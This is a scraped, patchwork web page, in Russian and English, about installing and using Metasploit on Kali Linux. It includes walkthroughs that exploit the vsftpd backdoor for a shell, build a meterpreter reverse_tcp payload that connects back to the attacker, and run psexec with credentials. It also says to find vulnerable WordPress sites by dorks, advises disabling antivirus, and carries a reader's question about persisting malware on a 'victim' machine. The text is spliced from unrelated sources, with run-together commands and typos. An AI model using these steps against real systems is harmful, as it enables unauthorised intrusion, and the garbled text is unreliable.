Kali linux & metasploit: getting started with pen testing

Описание WPSploit

WPSploit — это дополнительные модули для эксплуатации уязвимостей WordPress с помощью Metasploit.

Назначение этого репозитория — создание и/или портирование эксплойтов под WordPress, в качестве инструмента эксплуатации используется привычный многим Metasploit.

На данный момент имеется 39 модулей (14 эксплойтов и 25 вспомогательных, которые, как правило, проводят разнообразные сканирования/анализ имеющихся уязвимостей).

Все модули созданы с использованием информации базы данных уязвимостей WPScan. Нужно понимать, что главное отличие этих модулей от названной базы данных в том, что это не просто описания уязвимостей, а готовый эксплойты. Вам только нужно найти уязвимые сайты (по доркам или по собственным базам).

Домашняя страница: https://github.com/espreto/wpsploit

Metasploit Project

Computer Security Project

DownloadRatingsFeaturesDocumentation

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rap…New content will be added above the current area of focus upon selectionThe Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.

  • Wikipedia
  • Official site

Wrapping It Up

Docker containers offer a convenient way of running Metasploit Framework without having to deal with the installation of the tool’s code and its dependencies. Running Metasploit this way is especially handy for situations where you wish to quickly deploy it to a new system, such as one running in a public cloud, and then tear it down without losing your customizations or data. On the other hand, this approach requires some familiarity with Docker containers.

Thanks to Jean Christophe Baptiste for creating and maintaining the Dockerfile and associated configuration files upon which the «remnux/metasploit» image is based. If you notice any problems with this container or have suggestions for improving it, please log an issue on the REMnux repository for Docker files.

Updated May 12, 2016

Версия Kali Linux 2019 уже выпущена

Недавно вышла новая версия дистрибутива Kali Linux 2019.1. Новая версия tОн имеет обновленные версии включенных компонентов, включая использование ядра Linux 4.19. поскольку последняя версия включала ядро ​​4.18.

В составе дистрибутива некоторые приложения получили обновления и улучшения, из которых Мы можем выделить платформу анализа уязвимостей Metasploit 5.0, а также пакеты Harvester 3.0.0 и DBeaver 5.2.3, а также новый демон JSON-RPC.

Что касается поддержки добавлены разработчиками Kali Linux эти Устройства Banana Pi и Banana Pro были добавлены в сборку для систем ARM.

В унифицированных наборах для Raspberry Pi (в конфигурацию был добавлен скрипт kalipi-tft-config для настройки TFT LCD, что позволило избавиться от раздельной доставки изображений для плат с подключенными дисплеями).

Как получить Kali Linux 2019.1?

Здесь вы найдете ссылку для загрузки полного ISO-образа (3,2 ГБ) и уменьшенного образа (929 МБ).

Доступны наборы для архитектур x86, x86_64, ARM (armhf и armel, Raspberry Pi, Banana Pi, ARM Chromebook, Odroid). В дополнение к базовой сборке с GNOME и усеченной версии доступны версии с Xfce, KDE, MATE, LXDE и Enlightenment e17.

Si Вы уже являетесь пользователем Kali Linux, вам просто нужно зайти в свой терминал и выполнить следующую команду который будет отвечать за обновление вашей системы, поэтому для выполнения этого процесса необходимо подключение к сети.

Совет: как войти в Kali Linux после его установки?

Наконец, небольшой ресурс, который я оставляю новым пользователям Kali Linux и которые часто консультируются, — это как войти в Kali Linux.Пользователь: rootПередайте: «пароль, который вы указали в процессе установки»

Как записать Kali Linux ISO на USB?

В крайнем случае, я могу предложить вам метод создания USB-накопителя с Kali Linux. Этот метод во многом зависит от используемой вами операционной системы. Если вы пользователь Windows, вы можете использовать инструмент Win32 Disk.
С другой стороны, если вы пользователь Linux, вы можете использовать команду dd для монтирования ISO на свой USB, вам нужно только определить, в какой точке монтирования у вас есть USB, вы можете использовать:

И здесь вам будет показана точка монтирования, вам просто нужно использовать команду dd, например:

Где «if» — это путь, по которому находится ISO, проще всего расположить себя из терминала в папке, где вы сохранили ISO, а где «of» — это точка монтирования вашего USB.

Option 2 — Within the Container

This option is a Docker anti-pattern and I would recommend against it, but it’s still workable and I’ll leave it up to you to judge. This option is worse from performance perspective due to the copy-on-write magic Docker has to do for any file system changes within the container as compared to the image.

Once the container stops (i.e. when you exit the shell), it is not deleted by default. You can view all the containers, including stopped ones, using:

docker ps -a

Note the CONTAINER ID in the output. You can later restart the container using:

docker start --attach <CONTAINER ID>

The data is retained in the container.

Docker Cleanup

When working with Docker, you might end up with a bunch of stopped containers. Use the following command to delete all stopped containers:

docker container prune

You can also use to delete individual containers.

Справка по Metasploit

Использование:

msfconsole 
Общие параметры
    -E, --environment ОКРУЖЕНИЕ    Окружение Rails. Будет использовать переменные окружения RAIL_ENV если они установлены.  По умолчанию для работы ни опция, ни переменная окружения RAILS_ENV не устанавливаются.

Опции базы данных
    -M, --migration-path ДИРЕКТОРИЯ   Указать директорию, содержащую дополнительную базу данных
    -n, --no-database                Отключить поддержку базы данных
    -y, --yaml ПУТЬ                  Указать файл YAML, содержащий настройки базы данных

Опции фреймворка
    -c ФАЙЛ                          Загрузить особый конфигурационный файл
    -v, --version                    Показать версию

Опции модулей
        --defer-module-loads         Отложить загрузку модулей до явного запроса.
    -m, --module-path ДИРЕКТОРИЯ      Дополнительное размещение модулей


Console options:
    -a, --ask                        Спросить перед выходом из Metasploit или выйти по 'exit -y'
    -L, --real-readline              Использовать системную библиотеку Readline вместо RbReadline
    -o, --output ФАЙЛ                Вывод в указанный файл
    -p, --plugin ПЛАГИН              Загрузить плагин при старте
    -q, --quiet                      При старте не печатать баннер
    -r, --resource ФАЙЛ              Выполнить указанный файл ресурса (- для стандартного ввода)
    -x, --execute-command КОММАНДА    Выполнить указанную строку как консольную команду (для нескольких команд используйте ;)
    -h, --help                       Показать справку

Getting Started With the Metasploit Framework

In this post, we will run Metasploit on Kali Linux. Kali Linux is the leading penetration testing distribution and ships with more than 600 security tools. You can checkout our step-by-step guide on installing Kali Linux on VirtualBox.

1. Start the PostgreSQL Database Service

To get started Metasploit framework, you need to start the PostgreSQL database. That enables Metasploit to carry out faster searches and store information when scanning or performing an exploit. Launch the Terminal and execute the command below.

sudo service postgresql startsudo msfdb init

2. Launch Metasploit

As discussed above, there are four interfaces available for use with the Metasploit framework. We will use the msfconsole in this post. Now, there are two ways you can use to launch msfconsole on Kali Linux.

  • Command-line method
  • Graphical Method

With the command-line method, execute the command below on your Terminal.

msfconsole

Alternatively, you can start from the Kali GUI by clicking on the Menu button -> Exploitation tools -> Metasploit framework.

That will open the Terminal, and you will be prompted to enter the user password before launching the msfconsole command-line shell.

Руководство по Metasploit

Страница man отсутствует.

Основные команды
=============

    Команда       Описание
    -------       -----------
    ?             Меню помощи
    advanced      Показать продвинутые опции для одного или более модулей
    back          Вернуться назад из текущего контекста
    banner        Показать шикарный баннер metasploit 
    cd            Поменять текущую рабочую директорию
    color         Переключатель света
    connect       Связаться с хостом
    edit          Отредактировать текущий модуль с $VISUAL или $EDITOR
    exit          Выйти в консоль
    get           Получить значение переменной с учетом текущего контекста
    getg          Получить значение глобальной переменной
    grep          Grep вывод другой команды
    help          Меню помощи
    info          Отобразить информацию об одном или более модулей
    irb           Отбросить в режим сценариев irb
    jobs          Отображение и управление работами
    kill          Убить работу
    load          Загрузить плагин фреймворка
    loadpath      Поиск и загрузка модулей из расположения
    makerc        Начиная с запуска сохранить введённые команды в файл
    options       Отобразить глобальные опции для одного или более модулей
    popm          Извлекает последний модуль из стека и делает его активным
    previous      Установить предыдущий загруженный модуль в качестве текущего модуля
    pushm         Поместить активный или список модулей в стек модулей
    quit          Выйти из консоли
    reload_all    Перезагрузить все модули из указанного пути модулей
    rename_job    Переименовать работу
    resource      Запустить команды размещённые в файле
    route         Маршрут трафика через сессию
    save          Сохранить активные datastores
    search        Поиск модулей по имени и описанию
    sessions      Сбросить списки сессий и отобразить информацию по сессиям
    set           Установить значение переменной с учетом текущего контекста
    setg          Установить значение глобальной переменной
    show          Показать модули данного типа или все модули
    sleep         Ничего не делать данное количество секунд
    spool         Писать консольный вывод в файл и на экран
    threads       Просматривать и управлять фоновыми потоками
    unload        Выгрузить плагин фреймворка
    unset         Сброс одной или более переменной с учетом текущего контекста
    unsetg        Сброс одной или более глобальной переменной
    use           Выбрать модуль по имени
    version       Показать версии фреймворка и консольной библиотеки


Команды по управлению базой данных
=========================

    Команда           Описание
    -------           -----------
    creds             Список всех учётных данных в базе данных
    db_connect        Подключиться к существующей базе данных
    db_disconnect     Отключиться от текущего экземпляра базы данных
    db_export         Экспорт файла, содержащего контенты базы данных
    db_import         Импорт файл с результатами сканирования (тип файла будет определён автоматически)
    db_nmap           Выполнить nmap и автоматически записать вывод
    db_rebuild_cache  Пересоздать кэш модулей, содержащийся в базе данных
    db_status         Показать текущий статус базы данных
    hosts             Список всех хостов в базе данных
    loot              Список всей добычи в базе данных
    notes             Список всех заметок в базе данных
    services          Список всех служб в базе данных
    vulns             Список всех уязвимостей в базе данных
    workspace         Переключиться между рабочими пространствами базы данных

Disable Anti-virus Software

Anti-virus software detects the Metasploit Framework as malicious and may cause problems with the installation and runtime of Metasploit Framework. The Metasploit Framework exploits the same vulnerabilities that the anti-virus software detects. Therefore, when you install the Metasploit Framework, the anti-virus software interrupts the installation process and alerts you of the security risks that may infect the system.

If you intend to use the Metasploit Framework, you should disable any anti-virus software before you install Metasploit Framework. If you cannot disable the anti-virus software, you must exclude the Metasploit directory from the scan.

Metasploit Tutorial

After successfully launching , you will see a Terminal prompt with the format . For example, in our case, we are getting a prompt, as shown below. That means we are running Metasploit version 5. If you are using a newer version, say Metasploit version 6, you will see a prompt.

1. help command

The first and the most basic command you should execute is the command. If you are lost and don’t know which command to use, you can always refer to this documentation. It shows you all the commands you can run and a description of what they do.

Advertisement

help

NOTE:
Metasploit exploits an existing vulnerability on a system. Therefore, if there is no vulnerability or it’s already patched, Metasploit won’t penetrate the system.

2. search command

The other very useful command is . It allows you to search for a particular module among the hundreds of modules available in Metasploit. This command can take three parameters:

  • type
  • platform
  • name

For example, I will use the syntax below to search for a common Unix exploit for VSFTPD version 2.3.4.

search type:exploit platform:unix vsftpd

3. use command

The other most helpful command is the command. It allows you to load a module that you want to use to attack or penetrate a system. These modules include exploits, payloads, auxiliaries, encoders, evasions, nops, and posts.

As a demonstration, we will use a module to exploit an existing vulnerability on VSFTPD version 2.3.4. On the msfconsole, run the command below to load our exploit.

use exploit/unix/ftp/vsftpd_234_backdoor

If the module were successfully loaded, the prompt would change, as shown in the image above. It appends the path of the module in a different color (mostly red). If you see a similar message like «No payload configured, defaulting to…,» don’t worry. It means Metasploit could not automatically load the payload, and you will need to do it manually. In simple terms, a Payload is the code/ script executed through the said exploit. 

4. show options command

After successfully loading a module, the following command you need to execute is the command. 

show options

This command shows you the different options you can change with the module. For example, in the image above, we see this module requires us to set the RHOST and RPORT.

  • RHOST: That is the IP address of the remote system that you want to exploit.
  • RPORT: That is the target port you wish to use on the target system.

5. set command

The other helpful command is . This one allows you to set the various value displayed using the command. For example, if you wish to assign values to and we would use the syntax below.

set RHOST set RPORT e.gset RHOST 192.168.1.43set RPORT 21

If you rerun the show options command, you will notice there is a difference. The options RHOSTS and RPORT now have values assigned to them.

NOTE:
Some modules will have several options to set (more than six). In case you find some terms hard to understand their meaning, you can always use the help command.

6. show payloads command

The other command you need to run after this step is . This command lists all the payloads compatible with this module. 

show payloads

Running this command on our module only gave us one compatible payload. However, some modules will have more than ten compatible modules to choose from.

To load a particular payload, use the set command as shown below.

set payload cmd/unix/interact

8. run command

After successfully loading the payload, you are now ready to run this exploit against an existing vulnerability on the target system. Execute the command below.

run

From the image above, you can see we successfully ran the exploit against a target system and obtained a command shell session. That means we are now inside the system, and we can now run any Linux commands from our msfconsole, and they will execute on our target system.

How to Hack an Android Phone Using Metasploit Msfvenom in …

https://www.ehacking.net/2020/04/how-to-hack-an…

  • Launching An Attack
  • Post Exploitation
  • Extracting Contacts from An Android Device

Before launching attack, we need to check the status of the apache server. Type command: # service apache2 status All seems set, now fire up msfconsole. Use multi/handler exploit, set payload the same as generated prevoisly, set LHOST and LPORT values same as used in payload and finally type exploit to launch an attack. In real life scenarios, some social engineering techniques can be used to let the ta…

See more on ehacking.net

Published: Apr 13, 2020

Author: Irfan Sha…

Estimated Reading Time: 5 mins

Получение точки опоры

Полезная нагрузка

Metasploit предоставляет большой арсенал возможностей для создания полезной нагрузки. Но нужно учитывать, что существуют разные способы внедрения этой самой нагрузки. С помощью фреймворка можно создавать как легкие пейлоады для выполнения команд и получения простого шелла, так и сложные, например meterpreter или VNC (с использованием дополнительного загрузчика).

При этом одна и та же полезная нагрузка может работать как в режиме ожидания подключения (bind), так и в режиме reverse (для бэкконнекта от целевого хоста). Стоит учитывать, что чем легче нагрузка, тем больше ее надежность и стабильность. Так, обычный шелл может быть создан с помощью AWK, jjs, Lua, Netcat, Node.js, Perl, R, Ruby, socat, stub, zsh, ksh, Python, PHP, PowerShell.

Чтобы найти нагрузку для определенного случая, используем команду search.

1 search payload/

Некоторые виды полезной нагрузки Metasploit

В большинстве случаев используется загрузчик в одном из следующих форматов: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war. Для работы с пейлоадами в составе фреймворка имеется свой модуль — msfvenom.

Давайте для примера создадим нагрузку meterpreter типа reverse, работающую по протоколу TCP для операционной системы Windows, — это windows/x64/meterpreter/reverse_tcp.

Описание нагрузки windows/x64/meterpreter/reverse_tcp

Главными параметрами для этой полезной нагрузки будут LHOST и LPORT — адрес и порт нашего сервера для бэкконнекта. Создадим нагрузку в формате *.exe.

1 msfvenom-pпейлоадпараметрыпейлоада-fформат-oитоговыйфайл

Создание нагрузки с помощью msfvenom

Исполняемый файл с нагрузкой готов. Да, у msfvenom есть еще много функций вроде задержек и кодеров, но наша команда их не использует.

Листенер

За создание листенера отвечает модуль exploit/multi/handler. Этому модулю нужно указать только целевой пейлоад, с которым он будет взаимодействовать, и параметры этого пейлоада.

1
2
3
4
5

>useexploit/multi/handler

>set payload windows/x64/meterpreter/reverse_tcp

>set LHOST192.168.6.1

>set LPORT4321

>run

Создание листенера

Есть быстрый способ создать такой листенер — команда укладывается в одну строку.

1 handler-pпейлоад-Hхост-Pпорт

Создание листенера

И теперь наша задача сделать так, чтобы файл с нагрузкой был выполнен на целевом хосте.

Эксплоиты

Об используемых нами эксплоитах в обертке Metasploit Framework я расскажу кратко, так как для получения точки опоры мы используем только два из них. Это exploit/windows/smb/psexec и exploit/windows/smb/ms17_010_eternalblue. Конечно, если нам удается обнаружить уязвимые службы и для них есть эксплоиты в Metasploit, они тоже идут в дело, но такое случается редко.

В следующих разделах мы чуть подробнее разберем именно нагрузку meterpreter, так как легкие нагрузки обеспечивают доступ к обычному шеллу, а vncinject просто открывает удаленный рабочий стол. Для модуля psexec укажем полученные учетные данные, адрес целевого хоста и тип нагрузки с необходимыми параметрами.

1
2
3
4
5
6
7
8
9
10
11

>useexploit/windows/smb/psexec

>set payload windows/x64/meterpreter/reverse_tcp

>set LHOST192.168.6.1

>set LPORT9876

>set RHOSTS192.168.6.129

>set SMBUser root

>set SMBPass1q2w#E$R

>set SMBDomain domain.dom

>run

Получение сессии meterpreter

В итоге мы получаем сессию meterpreter для удаленного хоста с операционной системой Windows.

How to install Metasploit on Kali Linux

Since Metasploit is one of the most commonly used penetration testing tools, it comes built-in Kali Linux. If you are using Kali Linux 2.0, the Metasploit framework is already preinstalled and updated monthly.

Disable antivirus software since it detects the Metasploit framework as malicious and may cause problems with the installation and runtime of the Metasploit framework. The Metasploit framework exploits the same vulnerabilities that the antivirus detects. Hence, when installing the Metasploit framework, the antivirus software interrupts the installation process and alerts you of the security risks that may affect the system.

If you can’t disable the antivirus software, you must exclude the Metasploit directory from the scan.

Note: Remember to disable the local firewalls before installing or running the Metasploit framework. The firewall may detect the Metasploit framework as malware and interrupt the download. If you have to operate from behind a firewall, you should download the Metasploit framework from outside the network.

Metasploit installation on Kali Linux using Rapid7

Rapid7 provides an open-source installer for the Metasploit framework on the Linux Operating system. These installers include dependencies (ruby and PostgreSQL) that integrate with your package manager, making them easy to update.

The easiest way to get the Metasploit framework is by downloading the installer from the Rapid7 site. First, visit the website to find and download the installer for your operating system.

The installer provides a self-contained environment for you to run and update the Metasploit framework. All the necessary dependencies are installed and configured for you during the installation process.

When you launch the installer file, the installer will prompt you to enter the destination folder on the hard drive or external disk to install the Metasploit framework.

Install Metasploit on Kali Linux using Terminal

To install the Metasploit on Kali Linux, execute the command below:

sudo apt install metasploit-framework


install Metasploit framework

Starting the Kali PostgreSQL service

If PostgreSQL isn’t running, use the following command to run it:

sudo /etc/init.d/postgresql start 


start PostgreSQL

sudo /etc/init.d/postgresql status 


PostgreSQL status

Rapid7 includes msfconcsole and installs associated tools like Nmap and John the ripper. To install the Metasploit framework, you must have administrator privileges on the system that you want to use to run the framework.

Note: Rapid7 no longer supports the preinstalled Metasploit Community edition that is on Kali Linux 1.0.

The following script invocation will import the Rapid7 signing key and set up the package for supported Linux systems.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 && msfinstall && ./msfinstall


curl command

After installation is complete, open a terminal window and type the following command to start msfconsole


start msfconsole

Note: if you don’t have a database, you will be prompted to set up a new database.Type Y or Yes to run tyyyyhe initial configuration script to create the initial database.

It may already be in your path, and you can run it directly depending on your environment. A series of prompts will help set up a database and add Metasploit to your local path if it does not exist. These packages will integrate into your package manager and update with the msfupdate command or your package manager. The packages will automatically set up the database or use your existing database if this is the first time using it.

To check to see if the database was set up correctly, run the following command on the terminal:

db_status


checking DB status

If the Metasploit framework is successfully connected to the database, the following status will display:

 Connected to msf. Connection type: postgresql.

Managing the database

In case you did not opt to create a database when msfconsole loaded for the first time, you can use the msfdb script to configure PostgreSQL to run as your local user and store the database in

Use the following command to enable and start the database:

sudo msfdb init


initiate mfsdb

You can use any of the following commands to manage the database:

  • msfdb reinit – Deletes and re-initializes the database
  • msfdb delete – Deletes the database
  • msfdb start – Starts the database
  • msfdb stop – Stops the database
  • msfdb status – Shows the database status
  • msfdb run – Starts the database and runs msfconsole

How to install Metasploit in Kali Linux

I don’t like to write this section on how to install Metasploit in Kali Linux. It comes by default in previous versions.

Today I am going to describe here about installation on Metasploit. You can install it directly from the repository by using apt or apt-get command.

First update the repository list by using following command.

#apt-get update

Install the Metasploit framework on Kali Linux by running the following command:

#apt-get install metasploit-framework

You will get some configuration popups at the time of installation. Read configuration messages carefully and configure accordingly.

Upgrade glibc so Click on yes. You can change options by pressing “TAB” key, and for selecting press “ENTER” Key.

I have installed Metasploit successfully. I used command msfconsole to run the Metasploit framework but no success.

I go the following error “You may need to uninstall or upgrade bundler”

You can see in the following image:

Статья Как запустить Metasploit Framework в Kali Linux

Pirnazar

Для запуска Metasploit Framework в Kali 2.0 смотрите здесь.

Чтобы соответствовать Политике Сетевых Служб (Network Services Policy) Kali Linux, при загрузке отсутствуют сетевые службы, включая службы базы данных, поэтому нужно сделать пару шагов чтобы запустить Metasploit с поддержкой базы данных.

Запускаем службу Kali PostgreSQL Metasploit использует PostgreSQL как его базу данных, следовательно сначала её нужно запустить.

ООО Кодебай

BEEF 25.06.2015 в 03:01 Спасибо так и сделаю,так как в бектреке службы были всегда запущены,почему в кали они сделали по другому,не знаешь?еще можешь допилить скин как можно через гуй это все запустить гораздо быстрее по моему

WEBWARE TEAM 25.06.2015 в 06:30 Это слишком простая задача, чтобы писать для неё отдельный ГУЙ. Можно просто собрать всё это в одну команду:

service postgresql start && service metasploit start && update-rc.d postgresql enable && update-rc.d metasploit enable (эту команду нужно вводить один раз, т.к. теперь после каждой перезагрузки службы будут запускаться отдельно)

service postgresql start && service metasploit start && msfconsole

(эта команда запустить необходимые службы на один раз, а также сам Metasploit).

Можно эти строчки сохранить в файл и запускать этот файл двойным кликом:

echo -e ‘#! /bin/bashnservice postgresql start && service metasploit startnmsfconsole’ > Desktop/StartMetasploit.sh && chmod +x Desktop/StartMetasploit.sh (после выполнения этой команды на рабочем столе создастся файл, при двойном клике на который будет запускаться Metasploit).

но ГУЙ здесь точно не нужен.

LEO 11.07.2015 в 19:38 а подскажите есть какие нибудь эксплоиты под семерку чтоб удоленно можно было взлом произвести как примеру под xp такие есть,что то наподобии такого ms03_026_dcom .

MARK 26.10.2015 в 18:56 root@10101:

# service postgresql start root@10101:

# service metasploit start Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.

ТАРИК 23.04.2016 в 23:12 та же проблемка

SHA9 01.05.2016 в 17:08 решение #/etc/init.d/postgresql service –status-all service postgresql start service postgresql status

#/usr/bin/msfconsole msfdb init msfconsole msf > db_status

KURT135 23.01.2016 в 02:50 Народ вот подскажите мне как новичку… Взломал я комп ,вроде все хорошо , но возник другой вопрос . Как сделать так, чтобы фал (exe) созданный в metasploit установился в систему жертвы ,чтобы можно было в любо момент подключиться к данной машине (жертвы) ?

NKSHUM 21.03.2016 в 15:58 При вводе команды show options нет ни одного эксплойта. Командой mfsupdate обновить базу метасплойта не получается выдает следующее : Attempting for update Metasploit Framework . Cheking for update via the APT repository Note: expect weekly (ish) updates using this method No update available

Подскажите что делать?

SHA9 01.05.2016 в 16:45 Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.

проблема та-же,а решения пока никто не написал

Рейтинг
( Пока оценок нет )
Понравилась статья? Поделиться с друзьями:
Мой редактор ОС
Добавить комментарий

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: